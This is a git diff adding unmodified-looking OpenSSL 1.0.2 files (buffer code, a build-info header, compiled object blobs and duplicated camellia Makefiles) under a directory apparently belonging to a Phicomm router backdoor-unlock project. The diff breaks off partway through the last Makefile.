zEe~bn0p#MkqU`q-+YY)+_DiS*_Z{Re#v(@q+t2+T`94G%>->=H-K76b;U15%-`rk4
z(Viy&*F>z!t*ofGinn4oi+Zct3lAKoz~d+z2+X=>l-=2#kaf4Gv1_+Wl=a;P;+o$Z
zcrVd2>>=V}?)43@hhZQmEKdT^3&%e8!Vd$E@n5GvqTeRrmkIZJ4)!U+lXMA*{vsda
zJV*G=9(T9BqGyvVGn2<tP%WEP&#su2<IOrVCiKZnS~n*1`RQE2D5Nub&S2T8!v_nK
zMx|IT*GeomHD%PBwqaUU%@TpirTT)fs~CwA1k7@&XtO=^9&moVZry-`jPf+$c&20+
z0)H`p4+ik-0UUcQ{C^-k9Dgm~AB=w=trO-A#@`mev0ozoTmOJ3C_d)JAw;adz{UPK
zMh*fOeXoab(f9X5xaj-E5H9-8l*U5EF3y6sEnm+G%QDMF#Wv?{rW`NYMW)O)8ceZj
zI6-$+QJGSzRVro`T&gwORN%_n*|3YHmuY^o+EnURt!`TO0#GraIcJ=(iWS_j|AQnT
z1}=5@gr)#PIY)i)XTGnnQIEpFo~B>~h0|5=6@j>SFqF7aMhM6Agn0NSyBf+%?w+r(
zQ9l9$WBymZ3S3OJ3r0{x{=0%8*rF_<Q-mc$eqWNqju0+*LTkhixiMEbgdT)pywCb!
z1kZv;At2#Rx<6w51%me*#ticl1hj=C=`bI^k-hq#pbd4Nc-VjZY6!mQf3Ms~S)u$Z
p^ulq#Fh-b<F~hwF$p6y-`YcWY5?;S8@T?dABGvy|fQx3B|2O7Ah;{$~

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/buffer.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/buffer.c
new file mode 100644
index 0000000..d287e34
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/buffer.c
@@ -0,0 +1,187 @@
+/* crypto/buffer/buffer.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/buffer.h>
+
+/*
+ * LIMIT_BEFORE_EXPANSION is the maximum n such that (n+3)/3*4 < 2**31. That
+ * function is applied in several functions in this file and this limit
+ * ensures that the result fits in an int.
+ */
+#define LIMIT_BEFORE_EXPANSION 0x5ffffffc
+
+BUF_MEM *BUF_MEM_new(void)
+{
+    BUF_MEM *ret;
+
+    ret = OPENSSL_malloc(sizeof(BUF_MEM));
+    if (ret == NULL) {
+        BUFerr(BUF_F_BUF_MEM_NEW, ERR_R_MALLOC_FAILURE);
+        return (NULL);
+    }
+    ret->length = 0;
+    ret->max = 0;
+    ret->data = NULL;
+    return (ret);
+}
+
+void BUF_MEM_free(BUF_MEM *a)
+{
+    if (a == NULL)
+        return;
+
+    if (a->data != NULL) {
+        memset(a->data, 0, (unsigned int)a->max);
+        OPENSSL_free(a->data);
+    }
+    OPENSSL_free(a);
+}
+
+int BUF_MEM_grow(BUF_MEM *str, size_t len)
+{
+    char *ret;
+    size_t n;
+
+    if (str->length >= len) {
+        str->length = len;
+        return (len);
+    }
+    if (str->max >= len) {
+        memset(&str->data[str->length], 0, len - str->length);
+        str->length = len;
+        return (len);
+    }
+    /* This limit is sufficient to ensure (len+3)/3*4 < 2**31 */
+    if (len > LIMIT_BEFORE_EXPANSION) {
+        BUFerr(BUF_F_BUF_MEM_GROW, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    n = (len + 3) / 3 * 4;
+    if (str->data == NULL)
+        ret = OPENSSL_malloc(n);
+    else
+        ret = OPENSSL_realloc(str->data, n);
+    if (ret == NULL) {
+        BUFerr(BUF_F_BUF_MEM_GROW, ERR_R_MALLOC_FAILURE);
+        len = 0;
+    } else {
+        str->data = ret;
+        str->max = n;
+        memset(&str->data[str->length], 0, len - str->length);
+        str->length = len;
+    }
+    return (len);
+}
+
+int BUF_MEM_grow_clean(BUF_MEM *str, size_t len)
+{
+    char *ret;
+    size_t n;
+
+    if (str->length >= len) {
+        memset(&str->data[len], 0, str->length - len);
+        str->length = len;
+        return (len);
+    }
+    if (str->max >= len) {
+        memset(&str->data[str->length], 0, len - str->length);
+        str->length = len;
+        return (len);
+    }
+    /* This limit is sufficient to ensure (len+3)/3*4 < 2**31 */
+    if (len > LIMIT_BEFORE_EXPANSION) {
+        BUFerr(BUF_F_BUF_MEM_GROW_CLEAN, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    n = (len + 3) / 3 * 4;
+    if (str->data == NULL)
+        ret = OPENSSL_malloc(n);
+    else
+        ret = OPENSSL_realloc_clean(str->data, str->max, n);
+    if (ret == NULL) {
+        BUFerr(BUF_F_BUF_MEM_GROW_CLEAN, ERR_R_MALLOC_FAILURE);
+        len = 0;
+    } else {
+        str->data = ret;
+        str->max = n;
+        memset(&str->data[str->length], 0, len - str->length);
+        str->length = len;
+    }
+    return (len);
+}
+
+void BUF_reverse(unsigned char *out, const unsigned char *in, size_t size)
+{
+    size_t i;
+    if (in) {
+        out += size - 1;
+        for (i = 0; i < size; i++)
+            *out-- = *in++;
+    } else {
+        unsigned char *q;
+        char c;
+        q = out + size - 1;
+        for (i = 0; i < size / 2; i++) {
+            c = *q;
+            *q-- = *out;
+            *out++ = c;
+        }
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/buffer.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/buffer.h
new file mode 100644
index 0000000..c343dd7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/buffer.h
@@ -0,0 +1,119 @@
+/* crypto/buffer/buffer.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_BUFFER_H
+# define HEADER_BUFFER_H
+
+# include <openssl/ossl_typ.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# include <stddef.h>
+
+# if !defined(NO_SYS_TYPES_H)
+#  include <sys/types.h>
+# endif
+
+/* Already declared in ossl_typ.h */
+/* typedef struct buf_mem_st BUF_MEM; */
+
+struct buf_mem_st {
+    size_t length;              /* current number of bytes */
+    char *data;
+    size_t max;                 /* size of buffer */
+};
+
+BUF_MEM *BUF_MEM_new(void);
+void BUF_MEM_free(BUF_MEM *a);
+int BUF_MEM_grow(BUF_MEM *str, size_t len);
+int BUF_MEM_grow_clean(BUF_MEM *str, size_t len);
+size_t BUF_strnlen(const char *str, size_t maxlen);
+char *BUF_strdup(const char *str);
+char *BUF_strndup(const char *str, size_t siz);
+void *BUF_memdup(const void *data, size_t siz);
+void BUF_reverse(unsigned char *out, const unsigned char *in, size_t siz);
+
+/* safe string functions */
+size_t BUF_strlcpy(char *dst, const char *src, size_t siz);
+size_t BUF_strlcat(char *dst, const char *src, size_t siz);
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_BUF_strings(void);
+
+/* Error codes for the BUF functions. */
+
+/* Function codes. */
+# define BUF_F_BUF_MEMDUP                                 103
+# define BUF_F_BUF_MEM_GROW                               100
+# define BUF_F_BUF_MEM_GROW_CLEAN                         105
+# define BUF_F_BUF_MEM_NEW                                101
+# define BUF_F_BUF_STRDUP                                 102
+# define BUF_F_BUF_STRNDUP                                104
+
+/* Reason codes. */
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/buffer.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/buffer.o
new file mode 100644
index 0000000000000000000000000000000000000000..14551e48f8fca55c15fa829e1ac1b228e7370eba
GIT binary patch
literal 3312
zcmb_dZ){Ul6u)gJD+1kffGeV=Ca7DK#|kr8jnZyycg4<;v4$Wn&#rp|<JQjC*D)0T
z;2hymmJk!8iSfG<KO5KwX_#^HP57e31c@<9tw!e(C-YA|=l0(1?e3Lm;z{m1=l<^R
zoO{o?x2Lbh5^=Z7MTEG><78<jP(nslFWF&chKY}?BXbRRFVOKH{ZqREJnx4OoqPz_
zuj7YK6!Z7Sg2mv)sR&Fz*5Px$9v7_W7H^eO0IS?YX8;9!CaiGnWqSM*|1{fUqGGlr
zX<?t2T7S`r%jWt*w-PK;>x;QFwD2;IW&PY&LO13T=}iK6FD>k%)*KDZH;jJ<OEi>M
zj7C~WLZDgNa)Y`SN*^G8?C(D-6>T(NJMIAB?6|?N*jY;jBu>UX=R9BpFXP5^el{_=
zWdi1qZ6$yE)F|Vy8bqz{nO}LsxiN-rL|WAPj-gnbyKb^uIRK}GO2y!$R}z-4(3VTo
zbwMO;^%3jK1AUQa9FsNHQ0oS@ex)t5Wym(K(9l&#+qy!n1<cx$^p?)xnU4LjBJJk@
zUzYYMBu;kRH0^g8XL;HiBWK@Z@H+TH-rqRpEpPXq@}`rCrV5l~;x}^>4SjB|kDjbs
zMXecHDbo3`qbKS@<?GY*(hoohT`-%%Cxbw!r<IG*6A@SVL>rjJ^0(9d`N2WmP}78T
zc62-vXioO$GiE*zQg^7WTZ23EY#MxJd#l>o)>4HrB|_?8;ETNlM(0yW;wGes7(Nh`
z4OK;4FZK}EnBv;Jw%&Uheqe~-$=C3i5$X%L5BR+J3u@!|4%EAS%5iu4Q=gZRW|;2b
zYd@im`;=4eh|hoA6ZHkg>)cm;{)kU$7u=(q`@0jjw8X{pzt6c(a$QSdZ>S@)6{mHN
zW9PtHh-xhN^04YH$8hFh)pWwKb*vN*f#Nubhpb+K-pUZXt(D>-t5$#wfHd0jVs{1D
zW*DqfNglx(_^ujw7vLCQ#ASC5*wZ!mgPi|1XcYDiK<8jMo#%DHG5#C8sk65L*jqLD
z*b|U{6dp3l;(J*9g{X;+R??n~YhAG}Eu$YMT4$oWJ(AG6<MF+*UadFMo``9rqi6q~
z-fnF;H8hk>lUPrWHj+0r-7vDoqW7So>w?H^5%!>wJuDUsy&A&4rlp7UR7PTO5P60^
zsv9}{w_zO@G^T^E0h%3?JHST4-zs(|fj@>I2;x2%0=EzZK^*HW@DhR`GJg}Vx4iE?
z9GCaqR)fFO#&3ju#J>A%xc!{hYTydLPx(B4j?3q{zXpGsjgLJ{oTuA{+t2eR76(MG
zTY#a}d*QAOd04^+_`Fxb#ruCv!o@rPP{PG~CTi};u$k%yZ5ma5NLYqGlu}K7%p~eS
z%1jZpKbIq_k;MtpgKChd>Fn^Zo&icGYw9Yr{H-}Nm42Sj4`%Y}h>;!94f6=NVnF?n
zHfW@V@iG1n5`Y+Z#d4<#1BNnVFDA_Sb6{)u!M=re5r$!xYdqjP++htYqA5Bn{x6~2
z2Lo}rqu0v-l0oGC9|R0z%JhHhkNp*6ZiitP;V*Z5vA@t^a6-G)?hLlV5A=Y93qPTs
zfOTQpsgKGD@kN=tA8`B^ldg$`xqpEB2_@<;<}ZMOF=hW}x&K)~<XZM00^I5T$2f6}
z`{Dg#Erq|hf2Y0C#g9QjM4wp;HpY<sF{V?gn)&<t2-fW)*Y7r1bn^d&Z}gJg8Eo1A
E9}+V#1poj5

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buildinf.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buildinf.h
new file mode 100644
index 0000000..cc17ee5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buildinf.h
@@ -0,0 +1,19 @@
+#ifndef MK1MF_BUILD
+    /* auto-generated by util/mkbuildinf.pl for crypto/cversion.c */
+    #define CFLAGS cflags
+    /*
+     * Generate CFLAGS as an array of individual characters. This is a
+     * workaround for the situation where CFLAGS gets too long for a C90 string
+     * literal
+     */
+    static const char cflags[] = {
+        'c','o','m','p','i','l','e','r',':',' ','m','u','s','l','-','g','c','c',
+        ' ','-','I','.',' ','-','I','.','.',' ','-','I','.','.','/','i','n','c',
+        'l','u','d','e',' ',' ','-','D','O','P','E','N','S','S','L','_','N','O',
+        '_','E','R','R',' ','-','m','6','4',' ','-','D','L','_','E','N','D','I',
+        'A','N',' ','-','D','T','E','R','M','I','O','S',' ','-','O','s',' ','-',
+        'W','a','l','l','\0'
+    };
+    #define PLATFORM "platform: linux-x86_64-musl"
+    #define DATE "built on: Wed Oct  6 14:16:08 2021"
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/Makefile
new file mode 100644
index 0000000..88535f9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/Makefile
@@ -0,0 +1,112 @@
+#
+# crypto/camellia/Makefile
+#
+
+DIR= camellia
+TOP=	../..
+CC=	cc
+CPP=	$(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CMLL_ENC= camellia.o cmll_misc.o cmll_cbc.o
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+#TEST=camelliatest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=camellia.c cmll_misc.c cmll_ecb.c cmll_cbc.c cmll_ofb.c \
+	   cmll_cfb.c cmll_ctr.c cmll_utl.c
+
+LIBOBJ= cmll_ecb.o cmll_ofb.o cmll_cfb.o cmll_ctr.o cmll_utl.o $(CMLL_ENC)
+
+SRC= $(LIBSRC)
+
+EXHEADER= camellia.h
+HEADER= cmll_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+cmll-x86.s:	asm/cmll-x86.pl ../perlasm/x86asm.pl
+	$(PERL) asm/cmll-x86.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+cmll-x86_64.s:  asm/cmll-x86_64.pl
+	$(PERL) asm/cmll-x86_64.pl $(PERLASM_SCHEME) > $@
+cmllt4-sparcv9.s: asm/cmllt4-sparcv9.pl
+	$(PERL) asm/cmllt4-sparcv9.pl $(CFLAGS) > $@
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+camellia.o: ../../include/openssl/opensslconf.h camellia.c camellia.h
+camellia.o: cmll_locl.h
+cmll_cbc.o: ../../include/openssl/camellia.h ../../include/openssl/modes.h
+cmll_cbc.o: ../../include/openssl/opensslconf.h cmll_cbc.c
+cmll_cfb.o: ../../include/openssl/camellia.h ../../include/openssl/modes.h
+cmll_cfb.o: ../../include/openssl/opensslconf.h cmll_cfb.c
+cmll_ctr.o: ../../include/openssl/camellia.h ../../include/openssl/modes.h
+cmll_ctr.o: ../../include/openssl/opensslconf.h cmll_ctr.c
+cmll_ecb.o: ../../include/openssl/camellia.h
+cmll_ecb.o: ../../include/openssl/opensslconf.h cmll_ecb.c cmll_locl.h
+cmll_misc.o: ../../include/openssl/camellia.h ../../include/openssl/crypto.h
+cmll_misc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+cmll_misc.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cmll_misc.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+cmll_misc.o: ../../include/openssl/symhacks.h cmll_locl.h cmll_misc.c
+cmll_ofb.o: ../../include/openssl/camellia.h ../../include/openssl/modes.h
+cmll_ofb.o: ../../include/openssl/opensslconf.h cmll_ofb.c
+cmll_utl.o: ../../include/openssl/camellia.h ../../include/openssl/crypto.h
+cmll_utl.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+cmll_utl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cmll_utl.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+cmll_utl.o: ../../include/openssl/symhacks.h cmll_locl.h cmll_utl.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/Makefile.bak
new file mode 100644
index 0000000..88535f9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/Makefile.bak
@@ -0,0 +1,112 @@
+#
+# crypto/camellia/Makefile
+#
+
+DIR= camellia
+TOP=	../..
+CC=	cc
+CPP=	$(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CMLL_ENC= camellia.o cmll_misc.o cmll_cbc.o
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+#TEST=camelliatest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=camellia.c cmll_misc.c cmll_ecb.c cmll_cbc.c cmll_ofb.c \
+	   cmll_cfb.c cmll_ctr.c cmll_utl.c
+
+LIBOBJ= cmll_ecb.o cmll_ofb.o cmll_cfb.o cmll_ctr.o cmll_utl.o $(CMLL_ENC)
+
+SRC= $(LIBSRC)
+
+EXHEADER= camellia.h
+HEADER= cmll_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+cmll-x86.s:	asm/cmll-x86.pl ../perlasm/x86asm.pl
+	$(PERL) asm/cmll-x86.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+cmll-x86_64.s:  asm/cmll-x86_64.pl
+	$(PERL) asm/cmll-x86_64.pl $(PERLASM_SCHEME) > $@
+cmllt4-sparcv9.s: asm/cmllt4-sparcv9.pl
+	$(PERL) asm/cmllt4-sparcv9.pl $(CFLAGS) > $@
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+camellia.o: ../../include/openssl/opensslconf.h camellia.c camellia.h
+camellia.o: cmll_locl.h
+cmll_cbc.o: ../../include/openssl/camellia.h ../../include/openssl/modes.h
+cmll_cbc.o: ../../include/openssl/opensslconf.h cmll_cbc.c
+cmll_cfb.o: ../../include/openssl/camellia.h ../../include/openssl/modes.h
+cmll_cfb.o: ../../include/openssl/opensslconf.h cmll_cfb.c
+cmll_ctr.o: ../../include/openssl/camellia.h ../../include/openssl/modes.h
+cmll_ctr.o: ../../include/openssl/opensslconf.h cmll_ctr.c
+cmll_ecb.o: ../../include/openssl/camellia.h
+cmll_ecb.o: ../../include/openssl/opensslconf.h cmll_ecb.c cmll_locl.h
+cmll_misc.o: ../../include/openssl/camellia.h ../../include/openssl/crypto.h
+cmll_misc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+cmll_misc.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cmll_misc.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+cmll_misc.o: ../../include/openssl/symhacks.h cmll_locl.h cmll_misc.c
+cmll_ofb.o: ../../include/openssl/camellia.h ../../include/openssl/modes.h
+cmll_ofb.o: ../../include/openssl/opensslconf.h cmll_ofb.c
+cmll_utl.o: ../../include/openssl/camellia.h ../../include/openssl/crypto.h
+cmll_utl.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+cmll_utl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+cmll_utl.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+cmll_utl.o: ../../include/openssl/symhacks.h cmll_locl.h cmll_utl.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/Makefile.save
new file mode 100644
index 0000000..88535f9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/Makefile.save
@@ -0,0 +1,112 @@
+#
+# crypto/camellia/Makefile
+#
+
+DIR= camellia
+TOP=	../..
+CC=	cc
+CPP=	$(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CMLL_ENC= camellia.o cmll_misc.o cmll_cbc.o
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+#TEST=camelliatest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=camellia.c cmll_misc.c cmll_ecb.c cmll_cbc.c cmll_ofb.c \
+	   cmll_cfb.c cmll_ctr.c cmll_utl.c
+
